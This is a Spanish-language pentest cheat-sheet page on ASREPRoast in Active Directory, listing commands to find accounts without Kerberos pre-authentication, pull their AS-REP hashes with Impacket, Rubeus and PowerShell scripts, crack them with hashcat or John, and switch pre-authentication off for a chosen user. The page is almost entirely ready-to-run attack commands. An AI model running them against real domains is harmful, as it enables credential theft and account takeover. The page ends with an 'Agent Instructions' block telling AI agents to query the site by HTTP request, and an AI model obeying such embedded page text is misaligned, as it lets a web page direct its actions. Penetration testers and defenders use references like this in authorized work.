# ASREPRoast

## Descripción

Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (`DONT_REQ_PREAUTH`).

## Linux/Unix

Enumeración de usuarios con `DONT_REQ_PREAUTH` habilitado.

### Kerbrute

```shell
kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
```

* \<wordlists> = ruta de wordlist de nombres de usuarios de dominio.

### Impacket

```shell
GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt
```

### Hashcat

Cracking de AS-REP.

```shell
hashcat -m 18200 as-rep.txt <path-wordlist>
```

### John the Ripper

Cracking de AS-REP.

```shell
john as-rep.txt --format:krb5asrep --wordlist=<path-wordlist>
```

## Windows

Enumeración de usuarios con `DONT_REQ_PREAUTH` habilitado.

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired | select SamAccountName, UserPrincipalName, UserAccountControl | fl

# Módulo ActiveDirectory PowerShell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

Obtención de AS-REP de usuario.

```shell
# Rubeus
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat

# ASREPRoast.ps1
Get-ASREPHash -UserName <user> -Verbose
```

Obtención de AS-REP de todos los usuarios.

```powershell
# ASREPRoast.ps1
Invoke-ASREPRoast -Verbose
```

Habilitar configuración "Do not require Kerberos pre-authentication" (`DONT_REQ_PREAUTH`) para un usuario.

```powershell
# PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} –Verbose
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://activedirectory.mrw0l05zyn.cl/escalamiento-de-privilegios-de-dominio/asreproast.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.